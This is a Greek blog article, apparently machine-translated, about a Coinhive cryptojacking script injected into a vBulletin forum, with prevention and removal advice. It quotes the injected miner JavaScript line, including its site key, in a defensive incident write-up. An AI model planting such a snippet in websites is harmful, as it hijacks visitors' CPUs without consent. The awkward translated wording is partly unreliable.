Πώς να αφαιρέσετε το σενάριο κρυπτογράφησης Coinhive από τον ιστότοπό σας

Συνήθως επισκέπτομαι το φόρουμ καθημερινά και δεν το είχα δει την προηγούμενη μέρα. Υποθέτω ότι αυτό συνέβη κάποια στιγμή κατά τη διάρκεια της νύχτας, του χρόνου μου, όταν κοιμόμουν.

Χρησιμοποιώ το λογισμικό vBulletin για το φόρουμ και ενημερώθηκε για την τελευταία έκδοση. Επιπλέον, αυτό ήταν πολύ περίεργο για εμάς, καθώς ο τομέας TheWindowsClub.com χρησιμοποιεί το Sucuri Web Antivirus & Firewall για να προστατεύσει τον εαυτό του από τις online απειλές και επιθέσεις στον ιστό.

Το λογισμικό ασφαλείας του υπολογιστή μου σταμάτησε επιτυχώς την εκτέλεση κακόβουλου script στον υπολογιστή μου των Windows 10. Ελέγξαμε με άλλα προγράμματα περιήγησης όπως το Chrome & Edge και τα αποτελέσματα ήταν τα ίδια.

Μετά το δεξί κλικ στην ιστοσελίδα του φόρουμ και τον έλεγχο του πηγαίου κώδικα, βρήκα ότι ήταν ένα κακόβουλο σενάριο του CoinHive από το CryptoMiner

Αυτό είναι το κακόβουλο Javascript Coinhive που είχε πάρει τον κώδικα μου:

var miner = new CoinHive.Anonymous ("FG1d35B2h5xqzgJW0bbfyHT22ud9RnEm"); miner.start ()

Τέλος πάντων, το πρώτο πράγμα που έκανα ήταν να πάρω το φόρουμ κάτω και να ενημερώσει την Sucuri

Οι άνθρωποι Sucuri καθαρίζονται το φόρουμ του σεναρίου coinhive που είχε ωθηθεί στο φόρουμ μου μέσα σε λίγες ώρες, και όλοι ήταν εντάξει

Τι είναι CoinHive

Coinhive προσφορές ένα εξόρυξη JavaScript για την κρυπτογράφηση Monero που μπορείτε να ενσωματώσετε στον ιστότοπό σας και να χρησιμοποιήσετε το CPU των υπολογιστών επισκεπτών ιστότοπων για κέρματα για σας.

Αυτό καλείται Cryptojacking . Περιλαμβάνει την αεροπειρατεία των browsers των χρηστών για την εξόρυξη κρυπτοσυχνοτήτων. Ορισμένοι ιδιοκτήτες ιστότοπων μπορούν να το χρησιμοποιήσουν οι ίδιοι για να βγάλουν λεφτά - αλλά στην περίπτωσή μας, είχαν ενεθεί.

Όταν ένας χρήστης προσεγγίζει τον μολυσμένο ιστότοπο, το Coinhive JavaScript εκτελεί και εξορύσσεται από το Monero χρησιμοποιώντας τους πόρους του CPU του χρήστη. Αυτό μπορεί να οδηγήσει σε ασφυξία CPU & απρόσμενη συντριβή συστήματος της μηχανής του θύματος.

Τώρα, εάν το πρόγραμμα περιήγησής σας είναι μολυσμένο, θα δείτε την αξιοποίηση των πόρων σας να ανεβαίνει. Κλείστε το πρόγραμμα περιήγησης και θα πέσει. Ο χρήστης μπορεί να παρατηρήσει τη θέρμανση του μηχανήματος, τον ανεμιστήρα να τρέχει γρήγορα ή η μπαταρία να τρέχει γρήγορα.

Ζήτησα από τον συνάδελφό μου Saurabh Mukhekar να επισκεφτεί το φόρουμ μου χρησιμοποιώντας το Mac του και να δει τι συνέβη. Λοιπόν, ο υπολογιστής του Mac επηρεάστηκε πολύ όταν άνοιξε το φόρουμ με το Safari! Είναι ένας από αυτούς τους έξυπνους χρήστες Mac OSX που χρησιμοποιεί ένα λογισμικό προστασίας από ιούς για το Mac. Το λογισμικό Avast Antivirus for Mac σταμάτησε επιτυχώς την εκτέλεση του κακόβουλου script.

Το Saurinh,

Το κακόβουλο λογισμικό του CoinHive όχι μόνο πειραματίζει έναν υπολογιστή με Windows, αλλά και το Mac, καθώς βασίζεται σε πρόγραμμα περιήγησης με Javascript. Είναι καλό δεν πιστεύω στο μύθο ότι οι Mac δεν χρειάζονται ένα λογισμικό προστασίας από ιούς, αλλιώς η μηχανή μου θα είχε μολυνθεί και ο Mac μου θα συνέχιζε να βγάζει νομίσματα για κάποιον άλλο.

Αποτρέψτε το CoinHive να μολύνει τον ιστότοπό σας

1. Μην χρησιμοποιείτε πρότυπα ή plugins NULL στον ιστότοπο / το φόρουμ σας
2. Διατηρείτε το CMS ενημερωμένο στην πιο πρόσφατη έκδοση
3. Ενημερώστε το λογισμικό φιλοξενίας σας τακτικά (PHP, Βάση δεδομένων κ.λπ.)
4. Ασφαλίστε τον ιστότοπό σας με παρόχους ασφάλειας ιστού όπως Sucuri, Cloudflare, Wordfence κ.λπ.
5. Λάβετε τις βασικές προφυλάξεις για να εξασφαλίσετε το ιστολόγιό σας.

Αφαίρεση του CoinHive από τον ιστότοπο

Πρώτα απ `όλα, πρέπει να είστε ο webmaster της ή αν έχετε διαχειριστικά διαπιστευτήρια που σας δίνουν πρόσβαση σε όλα τα αρχεία ιστότοπων.

Τώρα που το antivirus ανιχνεύει τη μόλυνση CoinHive, κάντε δεξί κλικ στην ιστοσελίδα και επιλέξτε Προβολή πηγαίου κώδικα. Στη συνέχεια πατήστε Ctrl + F και αναζητήστε το "CoinHive".

Αφού εντοπίσετε τη θέση του κακόβουλου κώδικα, πρέπει να δείτε τη θέση του - όπου βρίσκεται. Τώρα πρέπει να το αφαιρέσετε με το χέρι. Για να το κάνετε αυτό, χρειάζεστε λίγη κωδικοποίηση της πλατφόρμας σας. Θα πρέπει να εντοπίσετε τα μολυσμένα αρχεία και να καταργήσετε με το χέρι την παραπάνω δέσμη ενεργειών από αυτό. Εάν δεν είστε σίγουροι γι `αυτό, παρακαλούμε να ζητήσετε από κάποιον εμπειρογνώμονα να το κάνει. Από τη στιγμή που χρησιμοποιούμε το Sucuri, το αφήνουμε να το κάνει.

Κάνοντας αυτό, καθαρίστε την cache του διακομιστή και του browser σας. Αν χρησιμοποιείτε οποιαδήποτε plugin κρυφής μνήμης ή λέτε MaxCDN, καθαρίστε και αυτές τις κρυφές μνήμες.

Προστατεύστε τον εαυτό σας από τα σενάρια κρυπτογράφησης

Η τεχνολογία Cryptocurrencies & Blockchain αναλαμβάνει τον κόσμο. Δημιουργεί αντίκτυπο στην παγκόσμια οικονομία και προκαλεί επίσης διακοπές στην τεχνολογία. Όλοι έχουν ξεκινήσει να εστιάζουν σε μια τόσο κερδοφόρα αγορά - και αυτό περιλαμβάνει και τους hackers ιστότοπων. Καθώς οι αποδόσεις αυξάνονται, θα πρέπει να αναμένουμε ότι αυτές οι τεχνολογίες θα χρησιμοποιηθούν κατάχρηση. Αυτή είναι η σκοτεινή πλευρά οποιασδήποτε αναδυόμενης τεχνολογίας.

Αυτό που μπορούμε να κάνουμε είναι να κάνουμε τις καλύτερες δυνατές προφυλάξεις ανά πάσα στιγμή. Εκτός από τη χρήση ενός καλού λογισμικού ασφαλείας, χρησιμοποιήστε μια επέκταση του Chrome ή του Firefox που εμποδίζει τους ιστότοπους από τη χρήση της CPU σας για να εξορύσσεται το Cryptocurrency - ή ακόμα καλύτερα, να χρησιμοποιήσετε το Anti-WebMiner που θα σταματήσει τις επιθέσεις Cryptojacking Mining Script τροποποιώντας το αρχείο Hosts. Λειτουργεί σε όλα τα προγράμματα περιήγησης. Εάν είστε χρήστης Mac, παρακαλούμε να πάρετε και ένα λογισμικό προστασίας από ιούς στον υπολογιστή σας.

Για περισσότερες πληροφορίες, εάν αισθανθείτε ότι επισκεφθήκατε μολυσμένο ιστότοπο, θα ήταν καλό να καθαρίσετε το πρόγραμμα περιήγησης cache και να σαρώσετε το μηχάνημά σας με το λογισμικό προστασίας από ιούς καθώς και με το AdwCleaner

Διατηρήστε την ασφάλεια